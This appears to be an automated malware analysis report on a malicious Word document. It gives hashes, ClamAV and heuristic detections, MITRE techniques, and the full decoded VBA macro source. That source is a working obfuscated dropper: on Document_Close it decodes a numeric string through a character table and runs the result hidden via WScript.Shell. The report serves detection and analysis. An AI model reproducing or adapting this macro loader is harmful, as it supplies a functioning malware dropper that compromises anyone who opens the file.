Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d8f73e616842ea74…

MALICIOUS

Office (OOXML)

Size: 36.8 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-01-12
MD5: 1a292f55814ef9e1f70049df9334fb57
SHA-1: 93ce5a6a664312b6486d000077fcdebe3fbddb9a
SHA-256: d8f73e616842ea745a15959c217dd383dd41cd0f706035759d40e5ea1ffdacce
Risk score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious OOXML document containing VBA macros. On Document_Close, the macros decode a long numeric literal through a character lookup table to build a command string at runtime, then pass it to WScript.Shell to execute it hidden; the command is most likely intended to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6386548-0' further supports its role as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6386548-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6386548-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(conferma) < 4774 Then
        CreateObject("WScript.Shell").Run conferma, vbHide * 4
      End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(conferma) < 4774 Then
        CreateObject("WScript.Shell").Run conferma, vbHide * 4
      End If
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/main — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2657 bytes
SHA-256: 3518c27c97f0688ae42b7196aeaa7573507d3b3056f1e4373ade31f70e98bcce
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function folgore(ByVal deforme As Integer) As String
 ceto = Array("?", "E", "z", "=", "s", ",", "a", "P", "V", "\", "j", ":", "(", "i", ".", "w", ";", "x", "o", "p", "-", "k", "l", "M", "S", "g", "B", "O", "D", "W", "N", "+", "'", "e", "A", "c", "q", ")", "f", "F", "T", "d", "y", "$", "v", "h", "n", "b", "m", "r", " ", "/", "C", "t")
 Dim aforisma As Integer
 
 For aforisma = LBound(ceto) To UBound(ceto)
   If aforisma = deforme Then
    folgore = ceto(aforisma)
   End If
 Next
 
End Function


Public Function prolunga(conferma As String)
  If Len(conferma) < 4774 Then
    CreateObject("WScript.Shell").Run conferma, vbHide * 4
  End If
End Function

Sub Document_Close()
 feralo = fulmine("19181533490445332222502030180117135350200117333550264219060404502052184848064641501230331520274710333553502442045333481430335314293347522213334653371428181546221806413913223312324553531911515118213836134745021735020241361015463641143518485124245153064621042114220248320550433346441134070728344034503150320906454228232708191433173332371650245306495320074918353304045043334644113407072834403432090645422823270819143317333216501230331520274710333553502442045333481430335314293347522213334653371428181546221806412453491346251232455353191151511821383613474502173502024136101546364114351848510414194519001341035306462104213237")
 Application.Run "prolunga", feralo
End Sub

Function esoso(ByVal qualcosa, ByVal latino) As String
 
 porfido = LTrim(vbNullString) & vbNullString
 avviso = Array(qualcosa, latino)
 
 For tombola = 0 To UBound(avviso)
   porfido = porfido + vbNullString + avviso(tombola) + vbNullString
 Next
 
 esoso = porfido
End Function

Function fulmine(Optional notizia As String, Optional notizia2)
  periodo = cloro(notizia)
  persuaso = Trim(vbNullString) & vbNullString

  For aforisma = 0 To Len(notizia)
    If (aforisma + 1) <= UBound(periodo) Then
    saltare = periodo(aforisma + 1)
    bulbo = periodo(aforisma)
    chiaro = Int(bulbo + saltare)
    resa = folgore(chiaro)
    persuaso = esoso(persuaso, resa)
    aforisma = aforisma + 1
    End If
  Next
  
  fulmine = persuaso
End Function


Function cloro(cesoia As String, Optional sorpasso As Integer) As Variant
    cloro = Split(Left(StrConv(cesoia, vbUnicode), Len(StrConv(cesoia, vbUnicode)) - 1), vbNullChar)
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 12800 bytes
SHA-256: 494e65c419f312c07678524f1986c1373b80651fd32c1d339f0fe93541baaeef
Detection
ClamAV: Doc.Dropper.Agent-6386548-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).